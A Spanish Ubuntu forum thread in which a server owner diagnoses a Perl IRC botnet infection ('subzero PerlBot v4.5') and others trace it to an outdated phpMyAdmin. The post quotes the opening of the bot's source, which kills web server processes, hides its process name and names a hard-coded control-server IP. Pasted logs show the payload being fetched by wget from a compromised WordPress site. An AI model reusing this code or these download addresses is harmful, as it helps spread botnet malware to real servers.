[Solucionado] Troyano subzero PerlBot v4.5

Imagen de Huelva
0 puntos

Hola a todos.

No soy ningún experto en Linux pero bueno, he hecho mis pinitos. Tengo un servidor para alojar 8 páginas web, servicio de backup cruzado e histórico, descargas, etc.

Ahora lo tengo montado en Luci 10.04 64bits pero antes lo tenía en 8.04 (creo recordar), sobre un Q6600 (4 nucleos).

El problema es que pasado unos meses de la reinstalación se van saturando los nucleos al 100% (primero uno y una hora despues otro etc) hasta colgarse el sistema. Investigo y resulta ser un perl que ejecuta un archivo temporal "a" en la carpeta /temp.

Ese archivo es un virus

#!/usr/bin/perl
# ----------------------------------------------------------- #
#                 subzero PerlBot v4.5                    #
#                     Fuck Off All                            #
# ----------------------------------------------------------- #

system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");
system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`");

my $processo = '-';


my @titi = ("index.php?page=","main.php?page=");

my $goni = $titi[rand scalar @titi];

my $linas_max='3';
my $sleep='7';
my @adms=("daemon");
my @hostauth=("localhost");
my @canais=("#perl");
chop (my $nick = `uname`);
chop (my $ircname = `whoami`);
chop (my $realname = `uname -sr`);
$servidor='67.19.105.66' unless $servidor;
my $porta='8080';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
....................... y mucho mas

El código es bastante mas largo pero no lo pongo aquí para no extenderlo.

En el log se ve cuando baja el virus

rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-Fgav45': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 15:39:32--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'

     0K .......... .....                                      100% 48.6K=0.3s

2012-01-13 15:39:35 (48.6 KB/s) - `c.txt' saved [16241/16241]

sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 15:39:36--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'

     0K .......... .....                                      100% 53.7K=0.3s

2012-01-13 15:39:38 (53.7 KB/s) - `/tmp/p' saved [16241/16241]

--2012-01-13 15:39:38--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied

Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]


mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
[Fri Jan 13 21:42:17 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
[Fri Jan 13 21:42:18 2012] [error] [client 127.0.0.1] File does not exist: /var/www/SPH
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
rm: cannot remove directory `/var/tmp/php': Permission denied
rm: cannot remove `.' directory `/var/tmp/.'
rm: cannot remove `..' directory `/var/tmp/..'
rm: cannot remove `/tmp/gedit.curro.4044826546': Operation not permitted
rm: cannot remove `/tmp/gnome-system-monitor.curro.3986015880': Operation not permitted
rm: cannot remove directory `/tmp/hsperfdata_curro': Operation not permitted
rm: cannot remove `/tmp/keyring-dLSdYd': Permission denied
rm: cannot remove `/tmp/libgksu-WASEJH': Permission denied
rm: cannot remove `/tmp/orbit-curro': Permission denied
rm: cannot remove `/tmp/orbit-root': Permission denied
rm: cannot remove `/tmp/pulse-Eci2r46O5MC3': Permission denied
rm: cannot remove `/tmp/ssh-iSsPhB1296': Permission denied
rm: cannot remove `/tmp/virtual-curro.k2sgkA': Permission denied
rm: cannot remove `.' directory `/tmp/.'
rm: cannot remove `..' directory `/tmp/..'
rm: cannot remove `/tmp/.ICE-unix/1296': Operation not permitted
rm: cannot remove `/tmp/.X0-lock': Operation not permitted
rm: cannot remove `/tmp/.X11-unix/X0': Operation not permitted
rm: cannot remove `/tmp/.esd-1000': Permission denied
rm: cannot remove `/tmp/.vbox-curro-ipc': Permission denied
rm: cannot remove directory `/tmp/.webmin': Operation not permitted
rm: cannot remove `/tmp/.winbindd/pipe': Permission denied
rm: cannot remove `/dev/shm/pulse-shm-1257430352': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1668825862': Operation not permitted
rm: cannot remove `/dev/shm/pulse-shm-1733714244': Operation not permitted
rm: cannot remove `.' directory `/dev/shm/.'
rm: cannot remove `..' directory `/dev/shm/..'
rm: cannot remove `/usr/games/gbrainy': Permission denied
rm: cannot remove `/usr/games/gnome-sudoku': Permission denied
rm: cannot remove `/usr/games/gnomine': Permission denied
rm: cannot remove `/usr/games/mahjongg': Permission denied
rm: cannot remove `/usr/games/quadrapassel': Permission denied
rm: cannot remove `/usr/games/sol': Permission denied
rm: cannot remove `.' directory `/usr/games/.'
rm: cannot remove `..' directory `/usr/games/..'
perl: no process found
--2012-01-13 21:42:38--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `c.txt'

     0K .......... .....                                      100% 37.1K=0.4s

2012-01-13 21:42:42 (37.1 KB/s) - `c.txt' saved [16241/16241]

sh: curl: not found
sh: fetch: not found
sh: lynx: not found
--2012-01-13 21:42:44--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
Saving to: `/tmp/p'

     0K .......... .....                                      100% 51.6K=0.3s

2012-01-13 21:42:45 (51.6 KB/s) - `/tmp/p' saved [16241/16241]

--2012-01-13 21:42:45--  http://www.kristofcreative.com/wp-content/plugins/uBillboard/cache/c.txt
Resolving www.kristofcreative.com... 72.232.160.130
Connecting to www.kristofcreative.com|72.232.160.130|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16241 (16K) [text/plain]
c.txt: Permission denied

Cannot write to `c.txt' (Permission denied).
sh: curl: not found
sh: cannot create a: Permission denied
sh: cannot create b: Permission denied
sh: lynx: not found
/var/tmp/p: Permission denied
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
mv: cannot stat `setup.php': No such file or directory
sh: ren: not found
Can't open perl script "c.txt": No such file or directory
Can't open perl script "/var/tmp/c.txt": No such file or directory
Can't open perl script "a": No such file or directory
Can't open perl script "p": No such file or directory
Can't open perl script "b": No such file or directory
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]
kill: 1: Usage: kill [-s sigspec | -signum | -sigspec] [pid | job]... or
kill -l [exitstatus]

El proceso perl es este:

http://img841.imageshack.us/img841/8478/cuelgue1.jpg

Información de Proceso
Comando	-
ID de Proceso	25408	Proceso padre	/sbin/init
Propietario	www-data	UCP	99.9 %
Medida	22968 kB	Tiempo de Ejecución	09:34:19
Nivel de prioridad (Nice)	 
IO scheduling class		IO priority	
Grupo Real	www-data	ID de grupo de Proceso	1539
Grupo	www-data	TTY	Ninguna
Started	00:42	Usuario Real	www-data

y estos son los archivos que abre

http://img823.imageshack.us/img823/1407/cuelgue2.jpg

Para proceso - (PID 25408)

Archivos abiertos

Descriptor de Archivo   	Tipo   	Medida de archivo   	Inodo   	Trayectoria   
Directorio actual	Directorio	4096	1835009	/tmp
Directorio raíz	Directorio	4096	2	/
Código de programa	Archivo regular	10416	1847282	/usr/bin/perl
Biblioteca compartida	Archivo regular	27032	2103551	/usr/lib/perl/5.10.1/auto/Socket/Socket.so
Biblioteca compartida	Archivo regular	22904	2103779	/usr/lib/perl/5.10.1/auto/IO/IO.so
Biblioteca compartida	Archivo regular	43296	1972107	/lib/libcrypt-2.11.1.so
Biblioteca compartida	Archivo regular	1572232	1966281	/lib/libc-2.11.1.so
Biblioteca compartida	Archivo regular	135745	1966364	/lib/libpthread-2.11.1.so
Biblioteca compartida	Archivo regular	534832	1972135	/lib/libm-2.11.1.so
Biblioteca compartida	Archivo regular	14696	1972139	/lib/libdl-2.11.1.so
Biblioteca compartida	Archivo regular	1487368	1718887	/usr/lib/libperl.so.5.10.1
Biblioteca compartida	Archivo regular	136936	1968483	/lib/ld-2.11.1.so
2w	Archivo regular	1383104	662674	/var/log/apache2/error.log
Conexiones de red abiertas

Tipo   	Protocolo   	Descriptor de Archivo   	Detalles   
IPV4	TCP	3u	150.1.30.222:47320	->	81.219.176.123:http-alt	ESTABLISHED
IPV4	TCP	11u	150.1.30.222:59877	->	193.27.78.88:http-alt	CLOSE_WAIT

Ya he pesado el Rkhunter y esta todo bien.

Datos curiosos:

  • Me pasó lo mismo con el 8.0432bits y 10.04 64bits, la instalación fué completamente nueva, aunque las webs y base de datos se conservaron.
  • la tarea se instala en cron cada segundo y el creador es www-data. He programado las tareas para que solo root pueda poner tareas nuevas y sin embargo sigue apareciendo la tarea pirata aunque la borre. cuando le digo de desactivarla no me deja porque el autor es www-data (curioso porque a pesar de tener que solo las pueden crear root me sale aunque no la puedo modificar) así que la borro.

En cuanto me vuelva a salir os pego aqui la tarea.

Todas mis sospechas es que viene por una vulnerabilidad del apache con el wordpress. Así que de momento he sacado todas las webs a otro servidor y solo he dejado una, para ir descartando que web es.

De todas formas acepto cualquier sugerencia.

Imagen de Huelva
+1
0
-1

Pues me puse a quitar servicios y haciendo pruebas descubrí que era una vulnerabilidad del phpadmin. Lo desactivé y listo, no se me ha vuelto a colgar el PC desde que lo he hecho (mas de dos meses), no tengo mas ataques, no tengo cuelgues, estabilidad absoluta.

Se ve que me atacaban la clave del phpadmin o alguna vulnerabilidad, hasta que entraban y desde ahí me atacaban las webs.

Pues como recomendación por tanto no usar el phpadmin o tenerlo desactivado hasta que lo necesites.

+1
0
-1

Ubuntu 8.10 -> 14.04

Imagen de Scorpyo82
+1
0
-1

Gracias por comentarlo, miraré a ver sobre el tema de phpadmin...

¿¿Te refieres a phpmyadmin??

Gracias, si eso muevo el enlace de var/www a otro lugar para que no se pueda usar, y cuando haga falta, como dices, lo muevo a su sitio, hago lo que necesite y lo vuelvo a cambiar.

Un saludo y gracias.

+1
0
-1

Si entro en Window$ estoy más tenso que en el bautizo de un gremlin.
Linux user: 545.017
Por favor, si solucionas el hilo añade [Solucionado] al título.

Imagen de Huelva
+1
0
-1

Si, perdona, se me fué la pinza, phpmyadmin.

+1
0
-1

Ubuntu 8.10 -> 14.04

Imagen de Scorpyo82
+1
0
-1

He actualizado a una versión más resiente, según sus creadores hay un fallo importante de seguridad en las versiones 3.3.0 a la versión 3.4.3.2 que permite obtener capacidades root.

De momento he actualizado phpmyadmin porque estaba por debajo de la 3.3.0 :S Gracias por avisar, no se me hubiese pasado por la cabeza pensar que estando la distribución actualizada tuviese una versión con vulnerabilidades...

Gracias de nuevo.

+1
0
-1

Si entro en Window$ estoy más tenso que en el bautizo de un gremlin.
Linux user: 545.017
Por favor, si solucionas el hilo añade [Solucionado] al título.